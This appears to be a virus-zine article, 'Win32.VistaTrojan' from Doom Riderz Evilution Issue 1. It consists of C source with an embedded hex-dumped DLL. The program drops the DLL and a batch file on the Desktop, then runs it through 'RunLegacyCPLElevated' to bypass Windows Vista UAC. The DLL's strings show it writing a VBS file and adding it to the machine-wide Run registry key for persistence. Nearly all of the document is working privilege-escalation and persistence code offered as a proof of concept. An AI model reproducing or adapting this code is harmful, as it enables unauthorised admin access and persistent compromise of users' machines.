Doom Riderz - Evilution Issue 1

Win32.VistaTrojan - by Wargame || Project Folder

#include <windows.h>
/* hex dump of our dll */
char TrojanCode[] = {
    0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0xC0,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68,
    0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,
    0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,
    0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x68,0x17,0x6F,0xFB,0x2C,0x76,0x01,0xA8,0x2C,0x76,0x01,0xA8,
    0x2C,0x76,0x01,0xA8,0xD0,0x56,0x13,0xA8,0x2D,0x76,0x01,0xA8,0xA2,0x69,0x12,0xA8,0x3C,0x76,0x01,0xA8,
    0x52,0x69,0x63,0x68,0x2C,0x76,0x01,0xA8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x04,0x00,
    0x3D,0xB5,0x4D,0x46,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0E,0x21,0x0B,0x01,0x05,0x0C,
    0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x10,0x00,0x00,
    0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,
    0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,
    0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x50,0x21,0x00,0x00,0x4B,0x00,0x00,0x00,
    0x30,0x20,0x00,0x00,0x3C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x38,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x04,0x01,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,
    0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,
    0x2E,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x9B,0x01,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x02,0x00,0x00,
    0x00,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,
    0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xD7,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,
    0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,
    0x2E,0x72,0x65,0x6C,0x6F,0x63,0x00,0x00,0x4E,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x02,0x00,0x00,
    0x00,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x55,0x8B,0xEC,0x68,0x04,0x01,0x00,0x00,0x68,0x2F,0x30,0x00,0x10,0xE8,0xC8,0x00,
    0x00,0x00,0x68,0x1E,0x30,0x00,0x10,0x68,0x2F,0x30,0x00,0x10,0xE8,0xC5,0x00,0x00,0x00,0x6A,0x00,0x68,
    0x80,0x00,0x00,0x00,0x6A,0x02,0x6A,0x00,0x6A,0x02,0x68,0x00,0x00,0x00,0x40,0x68,0x2F,0x30,0x00,0x10,
    0xE8,0x91,0x00,0x00,0x00,0x83,0xF8,0xFF,0x75,0x07,0x6A,0x00,0xE8,0x8B,0x00,0x00,0x00,0x93,0x68,0x71,
    0x31,0x00,0x10,0xE8,0x98,0x00,0x00,0x00,0x92,0x6A,0x00,0x68,0xD5,0x31,0x00,0x10,0x52,0x68,0x71,0x31,
    0x00,0x10,0x53,0xE8,0x78,0x00,0x00,0x00,0x53,0xE8,0x5A,0x00,0x00,0x00,0x68,0x33,0x31,0x00,0x10,0x68,
    0x06,0x00,0x02,0x00,0x6A,0x00,0x68,0x37,0x31,0x00,0x10,0x68,0x02,0x00,0x00,0x80,0xE8,0x6F,0x00,0x00,
    0x00,0x0B,0xC0,0x74,0x07,0x6A,0x00,0xE8,0x40,0x00,0x00,0x00,0x68,0x2F,0x30,0x00,0x10,0xE8,0x4E,0x00,
    0x00,0x00,0x91,0x51,0x68,0x2F,0x30,0x00,0x10,0x6A,0x01,0x6A,0x00,0x68,0x65,0x31,0x00,0x10,0xFF,0x35,
    0x33,0x31,0x00,0x10,0xE8,0x45,0x00,0x00,0x00,0xFF,0x35,0x33,0x31,0x00,0x10,0xE8,0x2E,0x00,0x00,0x00,
    0xC9,0xC2,0x10,0x00,0xFF,0x25,0x28,0x20,0x00,0x10,0xFF,0x25,0x1C,0x20,0x00,0x10,0xFF,0x25,0x18,0x20,
    0x00,0x10,0xFF,0x25,0x10,0x20,0x00,0x10,0xFF,0x25,0x24,0x20,0x00,0x10,0xFF,0x25,0x20,0x20,0x00,0x10,
    0xFF,0x25,0x14,0x20,0x00,0x10,0xFF,0x25,0x04,0x20,0x00,0x10,0xFF,0x25,0x00,0x20,0x00,0x10,0xFF,0x25,
    0x08,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1E,0x21,0x00,0x00,
    0x10,0x21,0x00,0x00,0x2E,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0xC6,0x20,0x00,0x00,0xF6,0x20,0x00,0x00,
    0xB8,0x20,0x00,0x00,0xAA,0x20,0x00,0x00,0xEA,0x20,0x00,0x00,0xDE,0x20,0x00,0x00,0x9C,0x20,0x00,0x00,
    0x00,0x00,0x00,0x00,0x7C,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x21,0x00,0x00,
    0x10,0x20,0x00,0x00,0x6C,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x21,0x00,0x00,
    0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x1E,0x21,0x00,0x00,0x10,0x21,0x00,0x00,0x2E,0x21,0x00,0x00,0x00,0x00,0x00,0x00,
    0xC6,0x20,0x00,0x00,0xF6,0x20,0x00,0x00,0xB8,0x20,0x00,0x00,0xAA,0x20,0x00,0x00,0xEA,0x20,0x00,0x00,
    0xDE,0x20,0x00,0x00,0x9C,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x1A,0x00,0x43,0x6C,0x6F,0x73,0x65,0x48,
    0x61,0x6E,0x64,0x6C,0x65,0x00,0x30,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x46,0x69,0x6C,0x65,0x41,0x00,
    0x80,0x00,0x45,0x78,0x69,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x00,0x62,0x01,0x47,0x65,0x74,0x57,
    0x69,0x6E,0x64,0x6F,0x77,0x73,0x44,0x69,0x72,0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x00,0x9E,0x02,
    0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6C,0x65,0x00,0xB5,0x02,0x6C,0x73,0x74,0x72,0x63,0x61,0x74,0x41,
    0x00,0x00,0xBF,0x02,0x6C,0x73,0x74,0x72,0x6C,0x65,0x6E,0x41,0x00,0x00,0x6B,0x65,0x72,0x6E,0x65,0x6C,
    0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x80,0x01,0x52,0x65,0x67,0x43,0x6C,0x6F,0x73,0x65,0x4B,0x65,
    0x79,0x00,0x99,0x01,0x52,0x65,0x67,0x4F,0x70,0x65,0x6E,0x4B,0x65,0x79,0x45,0x78,0x41,0x00,0xAE,0x01,
    0x52,0x65,0x67,0x53,0x65,0x74,0x56,0x61,0x6C,0x75,0x65,0x45,0x78,0x41,0x00,0x00,0x61,0x64,0x76,0x61,
    0x70,0x69,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3D,0xB5,0x4D,0x46,
    0x00,0x00,0x00,0x00,0x82,0x21,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
    0x78,0x21,0x00,0x00,0x7C,0x21,0x00,0x00,0x80,0x21,0x00,0x00,0x00,0x10,0x00,0x00,0x91,0x21,0x00,0x00,
    0x00,0x00,0x54,0x72,0x6F,0x6A,0x61,0x6E,0x5F,0x64,0x6C,0x6C,0x2E,0x64,0x6C,0x6C,0x00,0x43,0x50,0x49,
    0x41,0x70,0x70,0x6C,0x65,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x64,0x65,0x64,0x20,0x62,0x79,0x20,0x5B,0x57,0x61,
    0x72,0x47,0x61,0x6D,0x65,0x2F,0x64,0x6F,0x6F,0x6D,0x72,0x69,0x64,0x65,0x72,0x7A,0x5D,0x00,0x5C,0x56,
    0x69,0x73,0x74,0x61,0x54,0x72,0x6F,0x6A,0x61,0x6E,0x2E,0x76,0x62,0x73,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,
    0x4F,0x46,0x54,0x57,0x41,0x52,0x45,0x5C,0x4D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x5C,0x57,0x69,
    0x6E,0x64,0x6F,0x77,0x73,0x5C,0x43,0x75,0x72,0x72,0x65,0x6E,0x74,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,
    0x5C,0x52,0x75,0x6E,0x00,0x56,0x69,0x73,0x74,0x61,0x54,0x72,0x6F,0x6A,0x61,0x6E,0x00,0x6D,0x73,0x67,
    0x62,0x6F,0x78,0x20,0x22,0x54,0x68,0x69,0x73,0x20,0x69,0x73,0x20,0x61,0x20,0x73,0x69,0x6D,0x70,0x6C,
    0x65,0x20,0x50,0x6F,0x43,0x20,0x73,0x68,0x6F,0x77,0x69,0x6E,0x67,0x20,0x79,0x6F,0x75,0x20,0x68,0x6F,
    0x77,0x20,0x74,0x6F,0x20,0x67,0x65,0x74,0x20,0x61,0x64,0x6D,0x69,0x6E,0x20,0x72,0x69,0x67,0x68,0x74,
    0x73,0x21,0x22,0x2C,0x2C,0x22,0x43,0x6F,0x64,0x65,0x64,0x20,0x62,0x79,0x20,0x5B,0x57,0x61,0x72,0x47,
    0x61,0x6D,0x65,0x2F,0x64,0x6F,0x6F,0x6D,0x72,0x69,0x64,0x65,0x72,0x7A,0x5D,0x22,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x10,0x00,0x00,0x38,0x00,0x00,0x00,0x09,0x30,0x13,0x30,0x18,0x30,0x34,0x30,0x4B,0x30,0x58,0x30,
    0x5E,0x30,0x6F,0x30,0x7B,0x30,0x95,0x30,0xA1,0x30,0xAA,0x30,0xB0,0x30,0xBB,0x30,0xCA,0x30,0xD0,0x30,
    0xD6,0x30,0xDC,0x30,0xE2,0x30,0xE8,0x30,0xEE,0x30,0xF4,0x30,0xFA,0x30,0x00,0x31,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/**************************************/
int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    HKEY hKey;
    DWORD len = MAX_PATH,writtenBytes;
    char path[MAX_PATH],cmd[384],bat[MAX_PATH];
    HANDLE trfd = NULL,batfd = NULL;
    if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
    0,KEY_QUERY_VALUE,&hKey) != ERROR_SUCCESS)
    {
        ExitProcess(0);
    }
    if(RegQueryValueEx(hKey,"Desktop",0,NULL,path,&len) != ERROR_SUCCESS)
    {
        ExitProcess(0);
    }
    RegCloseKey(hKey);
    /* write the dll */
    lstrcpy(bat,path);
    lstrcat(path,"\\Trojan_dll.dll");
    lstrcat(bat,"\\go2admin.bat");
    if((trfd = CreateFile(path,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
    CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL)) == INVALID_HANDLE_VALUE)
    {
        ExitProcess(0);
    }
    WriteFile(trfd,TrojanCode,3072,&writtenBytes,NULL);
    CloseHandle(trfd);
    if((batfd = CreateFile(bat,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
    CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL)) == INVALID_HANDLE_VALUE)
    {
        ExitProcess(0);
    }
    sprintf(cmd,"RunLegacyCPLElevated shell32,Control_RunDLL \"%s\",\"Boof\"",path);
    WriteFile(batfd,cmd,lstrlen(cmd),&writtenBytes,NULL);
    CloseHandle(batfd);
    /* I use an external batch file coz a direct CreateProcess() didn't work in my tests */
    ShellExecute(NULL,"open",bat,NULL,NULL,SW_SHOW);
    ExitProcess(1);
}